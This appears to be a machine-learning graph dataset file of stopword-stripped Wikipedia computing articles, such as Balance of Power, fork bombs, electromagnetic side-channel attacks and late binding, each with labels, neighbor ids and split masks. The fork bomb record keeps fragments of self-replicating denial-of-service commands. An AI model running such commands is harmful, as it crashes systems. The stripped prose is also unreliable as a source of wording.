march laid majority staff including crawford ample severance enough allow write new game freelancer considering sequel eastern front political game inca empire eventually decided write cold war game peace crawford cited bob dylan blowin wind emotional inspiration game considering atari platform lost cause crawford began looking new 16-bit platforms coming market dismissed ibm pc crude amiga likely fail business reasons thus chose macintosh platform develop time non-trivial decision development tools mac programmers buy apple lisa write code platform april 1984 interview origins game fair crawford stated working game macintosh entitled arms race based philosophy h-bombs n't kill people geopolitics kills people may initial concept fleshed game would take place top world map could show various details events would presented newspaper stories following algorithmic concept developed considering headlines national enquirer events outcomes would expressed terms prestige points crawford difficulty finding publisher balance power due small part lingering effects 1983 crash random house eventually agreed publish considerable ill crawford editor assigned prior experience video games random house ultimately cancelled contract demanded crawford return 10,000 advance payment almost causing lose home wife demanded get real job work saved friend infoworld heard troubles published two-part column game article seen producer newly formed mindscape agreed publish betas ready february 1985 polished spring summer game released september immediate sensation given world height cold war fame small part helped review new york times magazine written david l. aaron jimmy carter deputy assistant president national security affairs called close one might get cut-and-thrust international politics without going confirmation senate game immediate hit initial macintosh apple ii platforms release microsoft windows 1.0 1986 made multiplatform best seller followed versions atari st 1987 amiga among others total game sold 10 million heyday time total sales gaming hardware software combined 500 million 1986 crawford published book also called balance power details internals game great depth explains background politics formulas used calculate prestige related parameters account lengthy gestation around 2013 fulfilling 2011 promise crawford released source code several games public domain among balance power computer gaming world stated balance power stands prestigious circle innovative computer games time academy awards computer games bop would get votes best picture best director 1985 1992 survey magazine wargames modern settings gave game four stars five 1994 survey gave three stars 1996 magazine listed game game scene 11 list 15 best ways die computer gaming dragon recommended game called superb game global strategy goes beyond games wherein thoughtful calculated geopolitics could prevent worldwide nuclear war well truly entertaining thought-provoking simulation world geopolitics involves player quest prevent worldwide nuclear holocaust promoting either u.s.a. russia world prominence marvelous program everyone experience least byte praised game 1986 describing mac version best game ever seen computer ... means get program info gave amiga version four-plus stars five approving complex gameplay good user interface complaining lack sound obvious macintosh influence magazine concluded excellent game bob ewald reviewed balance power space gamer/fantasy gamer 81 ewald commented conclusion type game appeals problems worth suffering however 're hardcore wargamer n't interested diplomacy suggest pass one compute presented opposing views game may 1988 magazine included balance power list favorite games calling impressive recreation world geopolitical landscape ... call one many bluffs 'll see chilling message ignited nuclear war orson scott card however wrote review game crawford— best designer simulation games 've seen —was leaning shoulder bullying playing game way sweet delusion long united states nice n't anything offend russians go home n't play way 'll stop game nasty remark world destroyed nuclear war added since nuclear war fought crawford could know would cause one lot experts claim soviets seem behave lot nicer stand disarm crawford sure right balance power n't game propaganda 1989 compute stated 1990 edition multipolar features welcome additions game year card stated magazine 1988 list caused reevaluate game playing 1990 edition stating detailed carefully extrapolated future world 've worked still criticizing geopolitical absurdities forcing united states passively accept soviet troops syria contrary happened yom kippur war advisors mexico start nuclear war card concluded outcomes probably reflected computer limitations rather crawford political views advised players pretend balance power set alien planet astonishingly similar earth play solely based game assumptions world chuck moss disagreed card revised view describing balance power computer gaming world 1992 reflect ing extreme bias part designers called pacific treatise ... nuclear war erupted u.s. much sent five million dollars panama crawford stated 1987 proud work game feel made world better place ... think made small number people much realistic appraisal world affairs 1996 computer gaming world ranked 78th best game time calling wonderful game political intrigue felt like cold war n't require detail shadow president cyberjudas year ranked 75th top game time next generation commented although game premises hopelessly outdated u.s.s.r. disagree politics ai balance power combined unique play style make classic 2006 guardian listed first list 10 political games everyone play balance power crawford began work entirely new game released 1987 selling thousand copies mindscape disappointed pressured crawford follow-up balance power company pressed hard crawford felt owed one publishing siboot sequel released 1989 balance power 1990 edition apple iigs windows macintosh amiga atari st. crawford n't consider proper sequel saying simply tidying adding bells whistles balance power 1990 edition adds countries advisors help player new multi-polar level allows countries generate events declaring war countries 2-player hotseat mode 1992 crawford left game industry make something interactive artistic many false starts emerged erasmatron later re-released name storytron systems used make complex interactive storylines demo crawford used storytron build balance power 21st century version begins 12 september 2001 mostly involves us interactions asia emerging powers success crawford describes crap balance power basis number play mail versions manually run based moves posted internet forum systems one long-running example hosted eregime",
    "neighbors": [
      4114,
      9166,
      6797,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 11347,
    "label": 4,
    "text": "List_of_data_breaches:list data breaches list data breaches using data compiled various sources including press reports government news releases mainstream news articles list includes involving theft compromise 30,000 records although many smaller breaches occur continually breaches large organizations number records still unknown also listed various methods used breaches also listed hacking common breaches occur north america estimated average cost data breach 150 million 2020 global annual cost forecast 2.1 trillion estimated first half 2018 alone 4.5 billion records exposed result data breaches 2019 collection 2.7 billion identity records consisting 774 million unique email addresses 21 million unique passwords posted web sale",
    "neighbors": [
      1251,
      10660,
      10182,
      488,
      5726,
      5002,
      4623,
      5007,
      6737,
      7151,
      3323,
      4956,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11348,
    "label": 0,
    "text": "Adam_Kilgarriff:adam kilgarriff adam kilgarriff 12 february 1960 – 16 may 2015 corpus linguist lexicographer co-author sketch engine parents booksellers spent one year volunteer kenya 1978–1979 began studying cambridge university graduating first class ba degree philosophy engineering 1982 first job housing officer london quadrant housing trust time studied south west london college 1987 left job started msc intelligent knowledge-based systems university sussex graduated following year continuing dphil computational linguistics thesis polysemy 1992 2008 made return trip kenya old friend raphael also participant hastings half marathon many years november 2014 diagnosed stage 4 bowel cancer succumbed may 2015 diagnosis started blog reflected experience disease thoughts language corpus linguistics life world general graduated university sussex phd 1992 became lecturer university brighton 1995 later visiting research fellow department informatics university sussex school modern languages cultures university leeds partnership b.t.s atkins sue atkins michael rundell brought setting first company lexicography masterclass ltd 2002 company provided consultancy training lexicography dictionary production shortly retirement sue atkins company dissolved 2012 2003 started company lexical computing limited delivering tools services corpus processing working lexicographer short period 1992–1995 longman dictionaries early research career closely associated word sense disambiguation phd thesis kilgarriff argued discrete classification word senses saw word senses rather continuous space meanings largely defined contexts word appears paper n't believe word senses 1997 became soon state-of-the-art argumentation topic work polysemy brought kilgarriff text corpora corpus linguistics devoted rest career one founding members former chair 2006–2008 special interest group web corpus sigwac association computational linguistics acl also one founding organizers senseval years 2000–2004 president special interest group lexicon siglex acl kilgarriff active member european association lexicography member board 2002–2006 consultant major publishing houses reviewer journals conferences around field working methods automatic acquisition large web corpora quantitative qualitative corpus analysis text genres corpus similarity homogeneity heterogeneity work corpora closely connected application computer lexicography kilgarriff invented notion word sketches one-page summaries word collocation behaviour particular grammatical relations represent core part sketch engine corpus management system",
    "neighbors": [
      1890,
      7724,
      7599,
      10160,
      5781,
      5214
    ],
    "mask": "None"
  },
  {
    "node_id": 11349,
    "label": 4,
    "text": "Electromagnetic_attack:electromagnetic attack cryptography electromagnetic attacks side-channel attacks performed measuring electromagnetic radiation emitted device performing signal analysis attacks specific type sometimes referred van eck phreaking intention capture encryption keys electromagnetic attacks typically non-invasive passive meaning attacks able performed observing normal functioning target device without causing physical damage however attacker may get better signal less noise depackaging chip collecting signal closer source attacks successful cryptographic implementations perform different operations based data currently processed square-and-multiply implementation rsa different operations emit different amounts radiation electromagnetic trace encryption may show exact operations performed allowing attacker retrieve full partial private keys like many side-channel attacks electromagnetic attacks dependent specific implementation cryptographic protocol algorithm electromagnetic attacks often done conjunction side-channel attacks like power analysis attacks electronic devices emit electromagnetic radiation every wire carries current creates magnetic field electronic devices create small magnetic fields use magnetic fields unintentionally reveal information operation device properly designed electronic devices affected phenomenon term ‘ device ’ refer anything desktop computer mobile phone smart card electromagnetic waves type wave originate charged particles characterized varying wavelength categorized along electromagnetic spectrum device uses electricity emit electromagnetic radiation due magnetic field created charged particles moving along medium example radio waves emitted electricity moving along radio transmitter even satellite case electromagnetic side-channel attacks attackers often looking electromagnetic radiation emitted computing devices made circuits electronic circuits consist semiconducting materials upon billions transistors placed computer performs computations encryption electricity running transistors create magnetic field electromagnetic waves emitted electromagnetic waves captured using induction coil analog digital converter sample waves given clock rate convert trace digital signal processed computer electronic device performing computations synced clock running frequencies order mega-hertz mhz giga-hertz ghz however due hardware pipelining complexity instructions operations take multiple clock cycles complete therefore always necessary sample signal high clock rate often possible get information operations sampling order kilo-hertz khz different devices leak information different frequencies example intel atom processor leak keys rsa aes encryption frequencies 50 mhz 85 mhz android version 4.4 bouncy castle library implementation ecdsa vulnerable key extraction side channel attacks around 50 khz range every operation performed computer emits electromagnetic radiation different operations emit radiation different frequencies electromagnetic side-channel attacks attacker interested frequencies encryption occurring signal processing responsible isolating frequencies vast multitude extraneous radiation noise isolate certain frequencies bandpass filter blocks frequencies outside given range must applied electromagnetic trace sometimes attacker know frequencies encryption performed case trace represented spectrogram help determine frequencies prevalent different points execution depending device attacked level noise several filters may need applied electromagnetic attacks broadly separated simple electromagnetic analysis sema attacks differential electromagnetic analysis dema attacks simple electromagnetic analysis sema attacks attacker deduces key directly observing trace effective asymmetric cryptography implementations typically traces needed though attacker needs strong understanding cryptographic device implementation cryptographic algorithm implementation vulnerable sema attacks perform different operation depending whether bit key 0 1 use different amounts power and/or different chip components method prevalent many different types side-channel attacks particular power analysis attacks thus attacker observe entire computation encryption deduce key example common attack asymmetric rsa relies fact encryption steps rely value key bits every bit processed square operation multiplication operation bit equal 1 attacker clear trace deduce key simply observing multiplication operations performed cases simple electromagnetic analysis possible provide enough information differential electromagnetic analysis dema attacks complex effective symmetric cryptography implementation sema attacks additionally unlike sema dema attacks require much knowledge device attacked fact circuits emit high-frequency signals may leak secret information known since 1982 nsa classified 2000 right around time first electromagnetic attack encryption shown researchers since many complex attacks introduced smart cards often colloquially referred “ chip cards ” designed provide secure financial transaction traditional credit card contain simple embedded integrated circuits designed performed cryptographic functions connect directly card reader provides power necessary perform encrypted financial transaction many side-channel attacks shown effective smart cards obtain power supply clock directly card reader tampering card reader simple collect traces perform side-channel attacks works however also shown smart cards vulnerable electromagnetic attacks well field-programmable gate arrays fpga commonly used implement cryptographic primitives hardware increase speed hardware implementations vulnerable software based primitives 2005 implementation elliptic curve encryption shown vulnerable sema dema attacks aria block cipher common primitive implemented fpgas shown leak keys contrast smart cards simple devices performing single function personal computers many things thus much difficult perform electromagnetic side-channel attacks due high levels noise fast clock rates despite issues researchers 2015 2016 showed attacks laptop using near-field magnetic probe resulting signal observed seconds filtered amplified digitized offline key extraction attacks require expensive lab-grade equipment require attacker extremely close victim computer however researchers able show attacks using cheaper hardware distances half meter attacks however required collection traces expensive attacks smartphones particular interest electromagnetic side-channel attacks since advent mobile phone payment systems apple pay e-commerce systems become increasingly commonplace likewise amount research dedicated mobile phone security side channel attacks also increased currently attacks proofs concept use expensive lab-grade signal processing equipment one attacks demonstrated commercial radio receiver could detect mobile phone leakage three meters away however attacks using low-end consumer grade equipment also shown successful using external usb sound card induction coil salvaged wireless charging pad researchers able extract user signing key android openssl apple commoncrypto implementations ecdsa widely used theoretical encryption schemes mathematically secure yet type security consider physical implementations thus necessarily protect side-channel attacks therefore vulnerability lies code specific implementation shown insecure luckily many vulnerabilities shown since patched vulnerable implementations include definitely limited following attacks described thus far mainly focused use induction detect unintended radiation however use far-field communication technologies like radios also used side-channel attacks although key extraction methods far-field signal analysis demonstrated therefore rough characterization potential adversaries using attack range highly educated individuals low medium funded cartels following demonstrates possible scenarios point sale systems accept payment mobile phones smart cards vulnerable induction coils hidden systems record financial transactions smart cards mobile phone payments keys extracted malicious attacker could forge card make fraudulent charges private key belgarric et al propose scenario mobile payments performed bitcoin transactions since android implementation bitcoin client uses ecdsa signing key extracted point sale types attacks slightly complex magnetic card stripe skimmers currently used traditional magnetic strip cards many public venues starbucks locations already offering free public wireless charging pads previously shown coils used wireless charging used detection unintended radiation therefore charging pads pose potential hazard malicious charging pads might attempt extract keys addition charging user ’ phone coupled packet sniffing capabilities public wi-fi networks keys extracted could used perform man-in-the-middle attacks users far-field attacks discovered attacker needs point antenna victim perform attacks victim need actively charging phone one public pads several countermeasures electromagnetic attacks proposed though one perfect solution many following countermeasures make electromagnetic attacks harder impossible one effective ways prevent electromagnetic attacks make difficult attacker collect electromagnetic signal physical level broadly hardware designer could design encryption hardware reduce signal strength protect chip circuit wire shielding faraday cage effective reducing signal well filtering signal introducing extraneous noise mask signal additionally electromagnetic attacks require attacking equipment close target distance effective countermeasure circuit designers also use certain glues design components order make difficult impossible depackage chip without destroying many electromagnetic attacks especially sema attacks rely asymmetric implementations cryptographic algorithms effective countermeasure ensure given operation performed given step algorithm gives information value bit randomization order bit encryption process interrupts clock cycle randomization effective ways make attacks difficult classified national security agency program tempest focuses spying systems observing electromagnetic radiation securing equipment protect attacks federal communications commission outlines rules regulating unintended emissions electronic devices part 15 code federal regulations title 47 fcc provide certification devices produce excess emissions instead relies self-verification procedure",
    "neighbors": [
      2050,
      7556,
      2567,
      3084,
      2957,
      7056,
      9745,
      658,
      660,
      1173,
      4389,
      10662,
      169,
      3629,
      11185,
      2357,
      10806,
      9528,
      1083,
      1087,
      9541,
      10315,
      6863,
      7887,
      8273,
      10963,
      212,
      9556,
      2265,
      7643,
      9697,
      229,
      7527,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 11350,
    "label": 1,
    "text": "Consultant_Plus:consultant plus consultant plus assistance system work legislation russia consultant centralized database updated daily distributed via network partners major competitors garant codex techexpert proprietary full federal law database includes 3 million documents regional acts distributed separate database 4 million documents information contained system structured several notions including every class mentioned consists several information banks simplify search throughout database manually excluding classes banks inappropriate current search database includes",
    "neighbors": [
      4347,
      6797,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 11351,
    "label": 4,
    "text": "Fork_bomb:fork bomb computing fork bomb also called rabbit virus wabbit denial-of-service attack wherein process continually replicates deplete available system resources slowing crashing system due resource starvation around 1978 early variant fork bomb called wabbit reported run system/360 may descended similar attack called rabbits reported 1969 burroughs 5500 university washington fork bombs operate consuming cpu time process forking saturating operating system process table basic implementation fork bomb infinite loop repeatedly launches new copies unix-like operating systems fork bombs generally written use fork system call forked processes also copies first program resume execution next address frame pointer continue forking endlessly within copy infinite loop effect causing exponential growth processes modern unix systems generally use copy-on-write forking new processes fork bomb generally saturate system memory microsoft windows operating systems equivalent functionality unix fork system call fork bomb operating system must therefore create new process instead forking existing one inline shell example using perl interpreter import os true int main public class forkbomb -- requires luaposix module local unistd require posix.unistd true end section .text _start example shell script told run two instances 0 ― 0 shell variable returning name script ― pipe output one results exponentially replicating processes 0|./ 0 simpler way run 0 twice 0 0 bash fork bomb performed declaring calling multiple-recursive function bomb bomb additionally one famous commonly cited examples fork bomb dense one-line bash command command obfuscated version trick used function name possible colon reserved character bash languages otherwise identical unicode support similarly rendered shorter done command line using escape specials condensed version designed run directly run ... prompt true fork bomb mode operation entirely encapsulated creating new processes one way preventing fork bomb severely affecting entire system limit maximum number processes single user may linux achieved using ulimit utility example command codice_1 would limit affected user maximum thirty owned processes pam-enabled systems limit also set codice_2 freebsd system administrator put limits codice_3",
    "neighbors": [
      5120,
      6272,
      5380,
      8582,
      4488,
      10508,
      6797,
      3867,
      1702,
      7847,
      7983,
      7091,
      3525,
      4423,
      6347,
      2253,
      855,
      2143,
      8930,
      10852,
      2409,
      8171,
      5492,
      3581,
      9727
    ],
    "mask": "None"
  },
  {
    "node_id": 11352,
    "label": 8,
    "text": "Telemetry_(company):telemetry company telemetry independent online advertising security optimization firm offices london new york city january 2017 telemetry shut amid declining revenues telemetry founded 2009 anthony rushton russell irwin beau chesluk three began collaborating 2001 created branded online video games name jaildog launched online tv station wedigtv 2007 winning 2008 international interactive emmy award best international interactive tv network order get telemetry ground rushton irwin chesluk invested £10,000 money within two years launch company valued £175 million telemetry system initially developed exclusively video embedding code online video record click-through mouse activity real-time 2012 company expanded display forms online advertising january 2017 telemetry shut amid declining revenues telemetry private company working independently online digital video advertisers agencies provide impartial detailed analytics auditing real time company tracks efficiency exposure gained online digital advertising campaigns order ensure accountability determine true value campaign exposing inflated reach impressions investigates whether ads delivered suitable website desired market alongside intended type content previously advertisers rely biased analytics vender essentially reporting traditional ad server statistics designed track online digital video advertising campaigns telemetry advised programmatic buying ads bought sold per-impression basis ways impressions counted set price misleading ads purchased pre-roll sometimes placed instead banner video ads typically muted viewer still counted pre-roll impressions telemetry encourages advertisers diligent demanding details placement quality ensure ads running proper space proper time impressions trading genuine impressions telemetry occasionally facing criticism bypassing media agencies selling digital ad space working advertisers directly according 2014 estimates interactive advertising bureau approximately 36 reported web traffic considered fake corresponding amount fake ad views due hijacked computers programmed visit sites cheating advertisers pay based number times ad loaded response visit telemetry exposed large frauds perpetrated online advertising landscape 2014 investigation verizon wireless online video advertising purchases finding excess 1 million spent fake web views telemetry advice verizon eighth-largest advertiser us demanded make-goods later 2014 telemetry investigated mercedes-benz online advertising campaign detecting suspicious traffic activity finding 57 campaign viewed often automated computer programs human beings mercedes refunded false impressions telemetry also brought public attention scheme ads forcefully injected onto popular sites including walmart.com youtube others third-party sellers without site owners knowledge profits going third party june 2014 telemetry uncovered ad fraud scheme going several months websites running lucrative video ads placed banner ads cheaper websites behind operation skimming around 10 million video ad revenue per month scheme affected 75 advertisers including mcdonald coca-cola ford rushton called significant instance ad fraud telemetry seen telemetry publicly called companies name unethically monetizing digital ads without site owner permission manipulating impressions often generating negative user experience telemetry clients include reckitt benckiser anheuser-busch unilever verizon wireless l'oreal mercedes-benz",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 11353,
    "label": 7,
    "text": "Globus_Toolkit:globus toolkit globus toolkit open-source toolkit grid computing developed provided globus alliance 25 may 2017 announced open source support project would discontinued january 2018 due lack financial support work globus service continues available research community freemium approach designed sustain software features freely available restricted subscribers globus toolkit contains set libraries programs provides developers specific tools apps solutions common problems encountered creating distributed system services applications globus software components capabilities includes globus toolkit adheres provides implementations following standards globus toolkit implementations ogf-defined protocols provide following globus toolkit components supported ogf-defined saga c++/python api number tools function globus toolkit including xml-based web services offer way access diverse services applications distributed environment 2004 univa corporation began providing commercial support globus toolkit using business model similar red hat gram grid resource allocation manager component globus toolkit officially supports following job schedulers batch-queuing systems unofficial job schedulers used globus toolkit globus alliance announced release globus toolkit version 5 gt5 late 2009 major change abandoning gram4 although continuing support least december 2010 favor enhanced gram2 called gram5 solve scalability issues add features reliable file transfer rft service replaced new globus.org service globus.org online hosted service i.e. software-as-a-service provides higher-level end-to-end grid capabilities initially concentrating reliable high-performance fire-and-forget data transfer retain web-service functionality without technology standards considered obsolete new project called globus crux started expects release alpha version end 2009 monitoring discovery tasks currently performed mds taken new crux-based integrated information services iis releases iis planned sometime 2010 release gt 5.0.2 announced 19 july 2010 gt 5.0.3 reported due release february 2011",
    "neighbors": [
      10625,
      9602,
      8070,
      5767,
      11658,
      1806,
      8339,
      404,
      9876,
      2710,
      5654,
      1304,
      11027,
      158,
      546,
      5283,
      5414,
      7983,
      823,
      9665,
      5956,
      198,
      1607,
      1862,
      8912,
      2135,
      2008,
      2394,
      2651,
      8030,
      479,
      4195,
      105,
      7018,
      9455,
      3449,
      8187,
      8702,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 11354,
    "label": 8,
    "text": "Apache_FreeMarker:apache freemarker freemarker free java-based template engine originally focusing dynamic web page generation mvc software architecture however general purpose template engine dependency servlets http html thus often used generating source code configuration files e-mails freemarker somewhat hectic history 2004 caused paradigm shifts significant changes multiple occasions freemarker 1 known freemarker classic separate project originally written benjamin geer mike bayer 2002 new project lead jonathan revusky released freemarker 2 started sequence several substantial changes main goal changes make template language strict i.e. detect many typos typical mistakes possible also automatic object wrapping introduced along gradual advancement type system template language language gained many power-user features powerful macro programming capabilities namespaces language reached quite settled state version 2.3 released 2004 q3 2016 product remained backward compatible significant backward incompatible changes expected freemarker 2 series future late 2015 freemarker granted apache software foundation entered apache incubator 2018-03-21 become fully accepted apache project following template processed freemarker produce something like variables like name messages coming outside template thus template author deal presentation issues template remains regardless variables coming database cookie calculated whatever ways also exact java api hence class values hidden freemarker using technique called object wrapping example messages seems list array javabeans body properties might well something different template affected long proper object wrapper used",
    "neighbors": [
      1258,
      5612,
      5677,
      7983,
      9590,
      8860
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11355,
    "label": 5,
    "text": "SDXF:sdxf sdxf structured data exchange format data serialization format defined rfc 3072 allows arbitrary structured data different types assembled one file exchanging arbitrary computers ability arbitrarily serialize data self-describing format reminiscent xml sdxf text format xml — sdxf compatible text editors maximal length datum composite well elementary encoded using sdxf 16777215 bytes one less 16 mib sdxf data express arbitrary levels structural depth data elements self-documenting meaning metadata numeric character string structure encoded data elements design format simple transparent computer programs access sdxf data help well-defined functions exempting programmers learning precise data layout word exchange name reflects another kind transparency sdxf functions provide computer architecture independent conversion data serializations exchanged among computers via direct network file transfer cd without measures sdxf functions receiving side handle architectural adaptation structured data data patterns predictable complex strings text commercial example two companies want exchange digital invoices invoices following hierarchical nested structure basic element chunk sdxf serialization chunk chunk consist set smaller chunks chunks composed header prefix six bytes followed data header contains chunk identifier 2-byte binary number chunk_id chunk length type may contain additional information compression encryption chunk type indicates whether data consists text string characters binary number integer floating point chunk composite chunks structured chunks enable programmer pack hierarchical constructions invoice sdxf structure follow every named term invoice invoice_no date address_sender etc given unique number range 1 65535 2 byte unsigned binary integer without sign top/outermost chunk constructed id invoice means associated numerical chunk_id structured chunk level 1 invoice chunk filled chunks level 2 beyond invoice_no date address_sender address_recipient invoice_sum single_items conditions level 2 chunks structured turn two addresses single_items precise description see page 2 rfc alternatively sdxf allows programmer work sdxf structures compact function set following pseudocode creates invoices pseudocode extract invoice structure could look like sdxf designed readability modified text editors related editable structure sdef",
    "neighbors": [
      11332,
      11303,
      11674,
      6555,
      6875,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11356,
    "label": 2,
    "text": "CDC_Kronos:cdc kronos kronos operating system time-sharing capabilities written control data corporation 1970s kronos ran 60-bit cdc 6000 series mainframe computers successors cdc replaced kronos nos operating system late 1970s succeeded nos/ve operating system mid-1980s mace operating system apex forerunners kronos written control data systems programmer greg mansfield dave cahlander bob tate three others",
    "neighbors": [
      6529,
      2179,
      11075,
      9991,
      8136,
      1902,
      7983,
      25,
      10458
    ],
    "mask": "None"
  },
  {
    "node_id": 11357,
    "label": 9,
    "text": "List_of_PHP_editors:list php editors article contains list text editors features specific php scripting language",
    "neighbors": [
      1668,
      3462,
      1034,
      6154,
      6797,
      9614,
      6176,
      2465,
      4777,
      2348,
      4919,
      823,
      190,
      9151,
      6338,
      2372,
      7364,
      8644,
      9924,
      1353,
      4171,
      10587,
      1632,
      3553,
      10341,
      10471,
      7785,
      8554,
      7147,
      11371,
      4853,
      11259,
      7293
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11358,
    "label": 4,
    "text": "Cybersecurity_and_Infrastructure_Security_Agency:cybersecurity infrastructure security agency cybersecurity infrastructure security agency cisa established 16 november 2018 president donald trump signed law cybersecurity infrastructure security agency act 2018 cisa standalone united states federal agency operational component department homeland security dhs oversight activities continuation national protection programs directorate nppd former nppd secretary christopher krebs cisa first director former deputy secretary matthew travis first deputy director expected role cisa improve cybersecurity across levels government coordinate cybersecurity programs states improve government cybersecurity protections private nation-state hackers formed 2007 national protection programs directorate nppd component united states department homeland security nppd goal advance department national security mission reducing eliminating threats u.s. critical physical cyber infrastructure nppd led secretary homeland security national protection programs appointed president united states confirmation united states senate november 16 2018 president trump signed law cybersecurity infrastructure security agency act 2018 elevated mission former nppd within dhs establishing cybersecurity infrastructure security agency cisa nppd lead component united states department homeland security protection nation physical cyber critical infrastructure key resources terrorist attacks natural disasters catastrophic incidents nppd collaborated shared information federal state local tribal international private-sector partners january 22 2019 cisa issued first-ever emergency directive mitigate dns infrastructure tampering 19-01 warning active attacker targeting government organizations using dns spoofing techniques perform man-in-the-middle attacks research group fireeye stated initial research suggests actor actors responsible nexus iran cisa subcomponents include federal protective service federal law enforcement agency provides integrated security law enforcement services federally owned leased buildings courthouses facilities properties assets well personnel associated agency leads department comprehensive security law enforcement services mitigating risk 9,000 federal facilities 1.1 million occupants nationwide operational activities include law enforcement response risk assessments federal facilities determine recommend install appropriate risk mitigation measures oversight 12,000 15,000 armed contract protective security officers depending customer requirements personnel conduct criminal investigations provide regular security awareness training stakeholders provide support major events office cybersecurity communications mission assuring security resiliency reliability nation cyber communications infrastructure includes national cyber security division collaborated public private international partners ensure security continuity nation cyber communications infrastructures event terrorist attacks natural disasters catastrophic incidents additionally cyber security communications protected strengthened reliability survivability interoperability nation communications capabilities including utilized emergencies federal state local tribal levels responsible overseeing national cyber security division national cybersecurity communications integration center coordinates responses cyberattacks headquartered arlington virginia office infrastructure protection led coordinated national effort reduce risk united states critical infrastructures key resources cikr posed acts terrorism department increases nation level preparedness ability respond quickly recover event attack natural disaster emergency formerly infrastructure analysis strategy division iasd within office infrastructure protection ocia established 2014 ocia important role dhs efforts implement presidential policy directive 21 calls integrated analysis critical infrastructure executive order 13636 identifying critical infrastructure cyber incidents could catastrophic impacts public health safety economy national security led coordinated efforts reducing risk nation physical critical infrastructure key resources terrorist attacks natural disasters catastrophic incidents integrating disseminating critical infrastructure key resources threat consequence vulnerability information developing risk mitigation strategies overseeing developing implementation national infrastructure protection plan nipp efforts helped ensure essential government missions public services economic functions maintained ip also ensured critical infrastructure key resources elements exploited use weapons mass destruction people institutions regulatory initiatives ammonium nitrate chemical facility anti-terrorism standards cfats programs office biometric identity management obim formerly united states visitor immigrant status indicator technology us-visit uses innovative biometrics-based technological solutions—digital fingerprints photographs—to provide decision-makers accurate information need according president proposed fiscal year 2013 budget us-visit program may transferred customs border protection immigration customs enforcement however proposed 2013 continuing resolutions house representatives senate rejected president proposal full transfer program instead senate establishes office biometric identity management nppd us-visit mission operations moving immigration customs enforcement likewise house proposed keeping us-visit program as-is nppd supports department homeland security responsibility protect nation providing biometric identification services help federal state local government decision makers accurately identify people encounter determine whether people pose risk united states us-visit supplies technology collecting storing biometric data provides analysis updates watchlist ensures integrity data",
    "neighbors": [
      2823,
      138,
      4240,
      8667,
      4830,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 11359,
    "label": 7,
    "text": "Vine_Toolkit:vine toolkit vine toolkit open source software framework used create grid-aware web applications according vine toolkit web site vine modular extensible java library offers developers easy-to-use high-level application programmer interface api grid-enabling applications vine deployed use desktop java web start java servlet java portlet environments ease according vine toolkit project page vine case used basic form without additional plugins could perceived mvc framework one key concepts vine plug-in based structure vine toolkit consists core project defines base api programming model upon sub projects built sub project addresses particular problem area like grid vine build upon core vine define general concepts extensible elements others like globus toolkit 4 vine concerned adding support particular third party libraries services project conforms particular file structure defines source code built well third party libraries configuration files packaged deployed since vine java flex based framework works major platforms including windows unix mac os top vine offers several deployment scenarios",
    "neighbors": [
      5956,
      10020,
      5612,
      5677,
      7983,
      5492,
      8122
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11360,
    "label": 1,
    "text": "Journal_of_Database_Management:journal database management journal database management quarterly peer-reviewed academic journal covering database management established 1990 published igi global editor-in-chief keng siau missouri university science technology journal abstracted indexed according journal citation reports journal 2015 impact factor 0.120",
    "neighbors": [
      2369,
      8627,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 11361,
    "label": 9,
    "text": "Late_binding:late binding late binding dynamic binding dynamic linkage computer programming mechanism method called upon object function called arguments looked name runtime early binding static binding object-oriented language compilation phase fixes types variables expressions usually stored compiled program offset virtual method table v-table efficient late binding compiler read enough information verify method exists bind slot v-table instead method looked name runtime primary advantage using late binding component object model com programming require compiler reference libraries contain object compile time makes compilation process resistant version conflicts class v-table may accidentally modified concern jit-compiled platforms .net java v-table created runtime virtual machine libraries loaded running application term late binding dates back least 1960s found communications acm term widely used describe calling conventions languages like lisp though usually negative connotations performance 1980s smalltalk popularized object-oriented programming oop late binding alan kay said oop means messaging local retention protection hiding state-process extreme late-binding things done smalltalk lisp possibly systems possible 'm aware early mid-1990s microsoft heavily promoted com standard binary interface different oop programming languages com programming equally promoted early late binding many languages supporting syntax level 2000 alex martelli coined term duck typing refer similar concept different emphasis late binding generally focuses implementation details duck typing focuses ability ignore types concentrate methods object currently dynamically-typed languages list methods object altered runtime requires late binding lisp late bound global function calls efficiently looked runtime via symbol function cell function bindings mutable example using interactive clozure common lisp session c++ late binding also called dynamic binding refers normally happens codice_1 keyword used method declaration c++ creates so-called virtual table look-up table functions always consulted called usually late binding term used favor dynamic dispatch com programming late-bound method call performed using idispatch interface com-based languages visual basic 6 syntactical support calling interface done defining variable type object others c++ require explicitly call getidsofnames look method invoke call .net late binding refers overriding codice_1 method like c++ implementing interface compiler builds virtual tables every virtual interface method call used run-time determine implementation execute also like com java common language runtime provides reflection apis make late binding calls use calls varies language c 4 language also added dynamic pseudo-type would used place object type indicate late binding desired specific late binding mechanism needed determined runtime using dynamic language runtime starting point visual basic uses whenever variable type object compiler directive option strict force default setting new vb project prior version 9 .net com objects could late bound vb 10 extended dlr-based objects three definitions late binding java early documents java discussed classes linked together compile time types statically checked compile time different implementations classes could swapped prior runtime simply overwriting class file long new class definition class method names code would still work sense similar traditional definition late binding currently popular use term late binding java programming synonym dynamic dispatch specifically refers java single dispatch mechanism used virtual methods finally java use late binding using reflection apis type introspection much way done com .net programming generally speaking program java call late binding likewise use duck typing techniques frowned upon java programming abstract interfaces used instead oracle current owner java known use term late binding duck typing sense discussing java languages documentation using early binding ada database-stored procedure timestamp checked verify stored procedure changed since code compiled allows faster executions prevents application running wrong version stored procedure using late binding timestamp check performed stored procedure executed via anonymous pl/sql block slower removes need recompile client applications stored procedure changes distinction appears unique pl/sql ada languages call pl/sql procedures well database engines use late binding late binding poorer performance early bound method call implementations correct method address must looked name call requiring relatively expensive dictionary search possibly overload resolution logic yet generally negligible modern computers compilers late binding may prevent use static type checking making late bound call compiler assume method exists means simple spelling error cause run-time error thrown exact exception varies language usually named something like method found method missing modern compilers avoid ensuring every possible call must implementation 